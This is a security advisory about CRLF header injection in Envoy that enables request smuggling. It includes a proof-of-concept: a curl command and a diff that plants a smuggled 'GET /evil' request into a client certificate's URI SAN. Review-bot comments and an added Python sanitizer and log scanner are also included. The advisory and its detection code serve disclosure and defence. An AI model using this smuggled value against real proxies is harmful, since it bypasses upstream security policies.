Impact
Request smuggling and bypass of security policies.
Affected components
HTTP
Attack vector/s
A specifically constructed HTTP request or mTLS connection with a specifically crafted client certificate.
The Envoy configuration must also include an option that adds request headers generated from request properties, such as the peer certificate SAN.
Description
Envoy does not sanitize or escape request properties when generating request headers. This allows characters that are illegal in header values, such as CR and LF, to be sent to the upstream service.
In the worst case, the upstream service may interpret the original request as two pipelined requests, possibly bypassing the intent of Envoy's security policy.
Example exploit or proof-of-concept
First, add a configuration entry that adds request headers to requests sent upstream.
+ request_headers_to_add:
+ - header:
+ key: x-foo
+ value: "%DOWNSTREAM_PEER_FINGERPRINT_256% %DOWNSTREAM_PEER_URI_SAN%"
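Review bot: the YAML indentation in this fragment has been flattened. In Envoy's route configuration `key` and `value` must be nested under `header`, and the `- header:` item must be nested under `request_headers_to_add`; as shown, the fragment will not parse as a HeaderValueOption. Restoring the indentation (and noting which level, route or virtual host, the option was placed at) would make the reproduction unambiguous.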
Then with curl:
curl -v --cacert test/config/integration/certs/servercert.pem --cert /tmp/clientcert.pem --key /tmp/clientkey.pem https://lyft.com:10000 --resolve lyft.com:10000:127.0.0.1 -H "Host: 127.0.0.1:20000"
The client cert/key were generated via test/config/integration/certs/certs.sh with the following patch:
diff --git a/test/config/integration/certs/clientcert.cfg b/test/config/integration/certs/clientcert.cfg
index 59da6cb1ee..68f913d1bd 100644
--- a/test/config/integration/certs/clientcert.cfg
+++ b/test/config/integration/certs/clientcert.cfg
@@ -35,6 +35,6 @@ subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
[alt_names]
-URI.1 = spiffe://lyft.com/frontend-team
+URI.1 = spiffe://lyft.com/\r\n\r\nGET /evil HTTP/1.1\r\n\r\nfrontend-team
DNS.1 = lyft.com
DNS.2 = www.lyft.com
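Review bot: this hunk rewrites the shared test fixture `clientcert.cfg` rather than adding a separate config for the malformed certificate, so anyone who regenerates the certificates with `test/config/integration/certs/certs.sh` after applying it would ship the CRLF-bearing URI SAN into every integration test that loads `clientcert.pem`. A dedicated config file, or at least a comment in the hunk stating that the change is for local reproduction only and must not be committed, would avoid that. The unchanged `DNS.1`/`DNS.2` lines also make clear that only the URI SAN carries the injected bytes, which is worth stating next to the `%DOWNSTREAM_PEER_URI_SAN%` header configuration above.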
Detection
Detection is possible if the request properties used to synthesize new headers are recorded in the access log. Examining the access log for illegal characters, such as CR or LF, in those properties can indicate a possible attack.
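The following is an added example, not code from Envoy or from the advisory, that demonstrates both points above: a header-value validator and sanitizer of the kind Envoy's header formatter lacked (the hardened form of the behaviour described under Description), and a scanner that applies the same check to access-log records as suggested under Detection. It assumes the operator configured Envoy's JSON access-log format (`json_format`) to emit the request properties that feed `request_headers_to_add`; the field name `peer_uri_san` and the sample records are constructed for this example.

```python
import json
import re

# RFC 7230 allows VCHAR, SP, HTAB and obs-text in a header field value. CR, LF,
# NUL, the other C0 controls and DEL are never legal; CR/LF in particular let a
# synthesized header terminate the header block and start a second request.
_ILLEGAL_HEADER_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def illegal_header_chars(value: str) -> list:
    """Return every illegal control character found in a would-be header value."""
    return _ILLEGAL_HEADER_CHARS.findall(value)


def sanitize_header_value(value: str) -> str:
    """Hardened form: neutralize control characters before a request property
    becomes a header value, so it can never split the upstream request."""
    return _ILLEGAL_HEADER_CHARS.sub("_", value)


def scan_access_log(lines, fields):
    """Scan JSON access-log records and report control characters in `fields`.

    Assumes Envoy's JSON access-log format (json_format) was configured to emit
    the request properties that feed request_headers_to_add; the field names are
    operator-chosen, so they are passed in. Returns (line_no, field, chars).
    """
    findings = []
    for line_no, line in enumerate(lines, 1):
        try:
            record = json.loads(line)
        except ValueError:
            continue  # not a JSON record (e.g. a truncated line); skip it
        for field in fields:
            value = record.get(field)
            if not isinstance(value, str):
                continue
            bad = illegal_header_chars(value)
            if bad:
                findings.append((line_no, field, sorted(set(bad))))
    return findings


# Constructed sample log (hypothetical field names): the second record carries
# the URI SAN from the advisory's proof-of-concept. JSON encoding keeps CR/LF
# escaped, so the record stays on a single line.
SAMPLE_LOG = [
    '{"method":"GET","path":"/","response_code":200,'
    '"peer_uri_san":"spiffe://lyft.com/frontend-team"}',
    '{"method":"GET","path":"/","response_code":200,'
    '"peer_uri_san":"spiffe://lyft.com/\\r\\n\\r\\nGET /evil HTTP/1.1\\r\\n\\r\\nfrontend-team"}',
    'not a json record',
]

if __name__ == "__main__":
    for line_no, field, chars in scan_access_log(SAMPLE_LOG, ["peer_uri_san"]):
        print(f"line {line_no}: field {field!r} contains {[hex(ord(c)) for c in chars]}")
    print(sanitize_header_value("spiffe://lyft.com/\r\nfrontend-team"))
```

The JSON format matters for the detection step: with a plain-text access-log format, an embedded LF in the logged SAN would split one record across two lines and the scanner would only see a truncated first half, whereas `json_format` escapes control characters and keeps each record intact.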
Mitigation
Disable adding request headers based on downstream request properties, such as downstream certificate properties.